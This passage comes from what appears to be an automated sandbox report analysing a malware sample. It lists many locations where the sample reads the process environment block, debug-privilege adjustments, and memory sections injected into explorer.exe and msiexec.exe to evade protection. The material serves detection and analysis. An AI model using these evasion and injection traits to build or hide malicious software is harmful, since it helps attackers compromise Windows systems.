    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1440E1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1440E1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1440E1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1458EC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149100 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149100 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149100 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17513A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17513A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E164120 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E164120 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E164120 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E164120 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E164120 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16B944 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16B944 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14B171 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14B171 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14C962 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2049A4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2049A4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2049A4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2049A4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172990 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A185 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16C182 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C51BE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C51BE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C51BE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C51BE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1761A0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1761A0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C69A6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1D41E8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14B1E1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14B1E1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14B1E1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565449 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565472 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00564802 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565435 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_0056548D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00564CBB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005654B9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565531 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005629C2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519E539 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0515A537 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05104D3B mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05104D3B mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05104D3B mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A8D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E3D34 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DAD30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05113D43 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05153540 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05183D40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F7D50 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FC577 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FC577 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D2D8A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D2D8A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D2D8A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D2D8A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D2D8A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510FD9B mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510FD9B mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05102581 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05102581 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05102581 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05102581 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05101DB5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05101DB5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05101DB5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051035A1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A05AC mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A05AC mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156DC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156DC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156DC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156DC9 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156DC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156DC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05188DF1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050ED5E0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050ED5E0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519FDE2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519FDE2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519FDE2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519FDE2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A740D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A740D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A740D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191C06 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156C0A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156C0A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156C0A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156C0A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510BC2C mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0516C450 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0516C450 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510A44B mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F746D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E849B mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A8CD6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051914FB mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156CF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156CF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05156CF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0516FF10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0516FF10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A070D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A070D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FF716 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510A70E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510A70E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510E730 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D4F2E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D4F2E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EEF40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EFF60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A8F6A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05157794 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05157794 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05157794 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E8794 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051137F5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510A61C mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510A61C mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DC600 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DC600 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DC600 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05108E00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191608 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0518FE3F mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DE620 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519AE44 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519AE44 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E766D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FAE73 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FAE73 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FAE73 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FAE73 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FAE73 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0516FE87 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051546A7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A0EA5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A0EA5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A0EA5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A8ED6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05118EC7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0518FEC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051036CC mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E76E2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051016E0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D9100 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D9100 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D9100 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510513A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510513A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F4120 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F4120 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F4120 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F4120 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F4120 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FB944 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FB944 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DC962 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DB171 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DB171 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05102990 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050FC182 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510A185 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051551BE mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051551BE mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051551BE mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051551BE mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051061A0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051061A0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051569A6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051949A4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051949A4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051949A4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051949A4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DB1E1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DB1E1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DB1E1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051641E8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05157016 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05157016 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05157016 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A4015 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A4015 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EB02A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EB02A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EB02A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EB02A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510002D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510002D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Maps a DLL or memory area into another processShow sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
